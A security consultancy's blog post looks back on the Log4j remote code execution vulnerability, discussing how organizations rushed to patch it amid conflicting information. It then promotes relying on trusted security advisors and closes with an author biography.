Log4J Vulnerability Still Looms: What We Can Learn from the Past About the Current Risks
Around this time last year (December 9th, to be exact), Apache revealed information regarding a vulnerability with a risk of 10.0 CVSS (the highest possible score). This issue was disclosed during the winter holidays, which is a particularly challenging time to effect technology changes within any organization. This finding was identified in Apache Log4j.
The critical Log4j vulnerability received an incredible amount of coverage in mainstream news outlets, mostly because it allows for Remote Code Execution (RCE). RCE allows an attacker to run any code on the infected system, over the internet. Information on the vulnerability was released quickly, and updates were released constantly. It was a race for security teams to identify and patch their systems.
Since the Log4j vulnerability consumed headlines, the term was used constantly. Remember: Log4j is a Java library. Many systems utilize Log4j libraries. The vulnerability is a Remote Code Execution and requires an update to a later version to remediate. Due to the nature of logging libraries, even if a specific organization doesn’t use it, it is very likely that a vendor or other dependent system that they rely on or are connected with does. In short: Log4j became an issue for every organization.
Once the information was released, discovery efforts were taken to determine affected systems. Many companies were happy to accept this opportunity to offer their own discovery services regarding the Log4j vulnerability. This flooded the landscape with repeated, and at times outdated, information looking to capitalize on the crisis. Timing was not on our side, being in the middle of the American holiday season. With a vulnerability holding this level of risk, every minute counts. This issue impacted such a large section of our technology landscape due to the nature of its logging functionality, and its inclusion in such a wide array of systems, I would dare to say every organization had to respond to Log4j in one way or another.
It took some time for the environment to stabilize and for the language to present a clear road to remediation. An update was released 7 days after the issue was identified.
When everyone is in a rush to speak, we should take a moment to stop and listen.
Accurate information can be more valuable than immediate information in some cases, and at times it is a challenge to sift through the noise. Time is crucial in these moments, and when there is a critical vulnerability in a live environment, the urgency puts tremendous pressure on the need for a solution. This is a consequence of time-sensitive situations: sometimes the accuracy of information sharing is at risk when it is rushed.
Getting the information right the first time and avoiding jumping to conclusions can greatly reduce frustration. But how can someone be sure the information they are getting is the most accurate? Cross referencing the information consumed from traditional media outlets with true examples gathered in real-time is perhaps the most effective tool that enterprises can use to validate their data.
To reliably access this information from lived experience, organizations should prioritize building relationships with members of the cyber security industry. A trusted advisor entrenched in the cyber security space can easily decode some of the most difficult-to-digest concepts and ideas regarding security. Even more importantly, security issues can be discussed in real time as soon as they come up. The coverage a security firm like Kuma maintains of the threat landscape can be an asset to any organization trying to gain visibility over blind spots. These relationships should be built on trust and understanding.
We should never make assumptions. Something as simple assuming the definition of a single word can lead to a chain of miscommunications, ultimately impacting an organization’s ability to make effective security decisions. When performing security research, the understanding of concepts is often nested, with each concept providing a new rabbit hole to dive into. Grow a trusted network of advisors that have a pulse on the threat landscape, and allow an expert to sort through this data for your team.
Click here to connect with a battle-tested and empathetic security expert today.
Catalino (Cat) Vega has the unique skill of being able to communicate at a high level to senior leaders, and at a technical level for the more hands-on staff in order to help get control over an organization’s security posture. He started his career in the USAF as a Staff Sergeant leading Network Operations for an entire base. Cat left the service in 2013, and from there he ran assessments on the Nation’s largest data centers and performed CISO functions for a diverse set of healthcare clients.
At Kuma, Cat is responsible for running specific client engagements in a CISO capacity, managing our vendor relationships, and helping organizations mature their application security programs at a technical level.